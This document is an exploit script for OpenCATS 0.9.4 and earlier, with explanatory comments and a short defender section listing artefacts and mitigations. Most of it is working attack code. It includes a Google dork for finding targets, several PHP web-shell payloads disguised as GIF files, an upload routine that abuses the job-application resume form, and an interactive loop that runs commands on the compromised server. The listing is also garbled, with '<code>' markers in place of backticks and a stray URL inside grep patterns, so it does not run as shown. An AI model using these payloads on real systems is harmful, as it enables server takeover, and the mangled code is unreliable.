# Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE)
# Google Dork: intext:"Current Available Openings, Recently Posted Jobs"
# Date: 21/09/2021
# Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar
# Vendor Homepage: https://www.opencats.org/
# Software Link: https://github.com/opencats/OpenCATS
# Version: <=0.9.4 Countach
# Tested on: Debian, CentOS, Windows Server
#
# What the listing does, as read from the code below:
#   1. Fetches pages from the target to read a version string (getVersion).
#   2. Writes a PHP file that starts with the GIF87a magic bytes into the
#      current working directory under a 5-character random name (writePayload).
#   3. Reads the public job list to obtain a job id, then posts the file as a
#      resume to the careers "onApplyToJobOrder" action (upload).
#   4. Requests the file back from upload/careerportaladd/ and relays typed
#      commands to it, one HTTP request per command (rev).
# The script relies on the uploaded file being stored under its original .php
# name in a web-served directory and being executed when requested.
#
# Defender view: artefacts of this flow, all visible in the requests below:
#   - a multipart POST to index.php?m=careers&p=onApplyToJobOrder carrying a
#     resumeFile part declared as application/x-php, candidateID=-1 and
#     applyToJobSubAction=resumeLoad;
#   - a *.php file appearing under upload/careerportaladd/;
#   - requests to that file with a parameter named "0", and responses that
#     begin with "GIF87a" (or do not, after the fallback upload further down).
# Restricting resume uploads to an allow-list of document types and disabling
# script execution for the upload directory are the controls that break this
# chain; the header lists the affected versions as <=0.9.4.
#
# NOTE(review): the text is reproduced as the page shows it, including the
# "<code>" markers and the host-qualified URL inside the two grep patterns.
# Both look like residue of the page's HTML rendering, and the listing does
# not parse as shell in this form.

#!/bin/bash

# Require the target base URL as the only argument.
if [ $# -eq 0 ]
then
  echo "Usage: $0 <target URL>"
  exit
fi

# Content of the uploaded file. Every variant begins with the GIF87a magic
# bytes and passes request parameter "0" to a PHP command-execution function.
# if a payload doesn't work, try another
payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo exec($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo <code>$_REQUEST[0]</code>; ?>'
#payload='GIF87a<?php echo system($_REQUEST[0]); ?>'
#payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>'

target=$1

# ANSI colour escapes used by the status messages.
green="\033[0;32m"
red="\033[0;31m"
reset="\033[0m"

#====================== Functions

#######################################
# Interactive loop: reads a line from stdin and sends it as POST parameter "0"
# to the URL in $1, printing the response without its leading GIF87a marker
# and without its last line. Each command is a separate HTTP request; no
# connection is opened from the server back to the caller.
# Arguments: $1 - URL of the uploaded file
# Returns:   never returns on its own (while true)
#######################################
rev() {
  while true
    do echo -n -e "\n$ "
    read cmd
    curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d"
  done
}

#######################################
# Posts a file to the job-application endpoint as a multipart form.
# The form fields sent are resumeFile (content type application/x-php),
# ID, candidateID=-1 and applyToJobSubAction=resumeLoad.
# TLS certificate verification is disabled (-k and --insecure).
# Globals:   firstJb (read) - job id placed in the ID field
# Arguments: $1 - base URL, $2 - path and query string, $3 - local file
# Outputs:   the server response on stdout
#######################################
upload() {
  curl -skL $1/$2 \
  -H "Connection: close" \
  -F resumeFile=@"$3;type=application/x-php" \
  -F ID="$firstJb" \
  -F candidateID="-1" \
  -F applyToJobSubAction="resumeLoad" \
  --compressed \
  --insecure
}

#######################################
# Tries to read the application version: first from a <span> on the page at
# $1, then from the "CATS version is ..." text on installtest.php. Failure is
# not fatal; the function returns 0 either way.
# Globals:   ver (written), red/green/reset (read)
# Arguments: $1 - base URL
#######################################
getVersion() {
  ver=<code>curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"
  if [ -z "${ver}" ]
  then
    # Second source: the installer self-test page, if it is still reachable.
    ver=<code>curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"
    if [ -z "${ver}" ]
    then
      echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}"
      return 0
    fi
  fi
  echo -e "${green}[*] Version detected: $ver${reset}"
}

#######################################
# Writes $1 to a file named <5 random alphanumerics>.php in the current
# working directory.
# Globals:   tmpfile (written) - local file name
#            file (written)    - its basename, reused later as the remote name
# Arguments: $1 - file content
#######################################
writePayload(){
  tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php"
  file=<code>basename $tmpfile
  echo "$1" > $tmpfile
}

#######################################
# Prints a base64-encoded ASCII-art banner with the tool name and author
# credit.
#######################################
banner(){
  echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d
  echo -e "\n"
}

#======================

banner
echo "[*] Attacking target $target"
echo "[*] Checking CATS version..."
getVersion $target

#exit

echo "[*] Creating temp file with payload..."
writePayload "$payload"

#exit

# The upload form needs the id of an open job, so the public job list is read
# first: numJb is the "Posted Jobs" count, firstJb the id in the first link.
echo "[*] Checking active jobs..."
jbRequest=<code>curl -skL $target'/careers/index.php?m=careers&p=showAll'
numJb=<code>echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'
firstJb=<code>echo "$jbRequest" | grep -m 1 '<td><a href="https://www.exploit-db.com/exploits/50585/index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'

if [[ ! $numJb -gt 0 ]]
then
  echo -e "${red}[-] No active jobs found.${reset}"
  echo "[*] Trying another path..."
  # Same listing requested without the /careers prefix.
  jbRequest=<code>curl -skL $target'/index.php?m=careers&p=showAll'
  numJb=<code>echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'
  if [[ ! $numJb -gt 0 ]]
  then
    # With no open job the script stops here; it has no other upload path.
    echo -e "${red}[-] Couldn't find any active job.${reset}"
    exit
  fi
fi

# Re-derived because jbRequest may have been replaced by the fallback above.
firstJb=<code>echo "$jbRequest" | grep -m 1 '<td><a href="https://www.exploit-db.com/exploits/50585/index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'
echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}"

echo "[*] Sending payload..."
req=<code>upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"

# Success is inferred from the response text: either one of the two
# "... be uploaded" phrases or the file name itself.
if ! <code>echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"
then
  echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}"
  echo "[*] Checking by another method..."
  # Second attempt: the GIF87a prefix is stripped from the local file and the
  # form is posted to the path without the /careers prefix.
  sed -i "s/GIF87a//" $tmpfile
  req=<code>upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"
  if ! <code>echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"
  then
    echo -e "${red}[-] Couldn't upload payload...${reset}"
    exit
  fi
fi

echo -e "${green}[+] Payload $file uploaded!"
echo "[*] Deleting created temp file..."
# Removes only the local copy; nothing in this script deletes the uploaded file.
rm $tmpfile
echo "[*] Checking shell..."
# Execution check: the marker string 0x7359 is echoed through parameter "0"
# and looked for in the response from upload/careerportaladd/<name>.php.
check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file")
if <code>echo $check | grep -q "0x7359"
then
  echo -e "${green}[+] Got shell! :D${reset}"
  # First request runs "id;uname -a"; the interactive loop follows.
  curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d"
  rev $target/upload/careerportaladd/$file
else
  echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}"
fi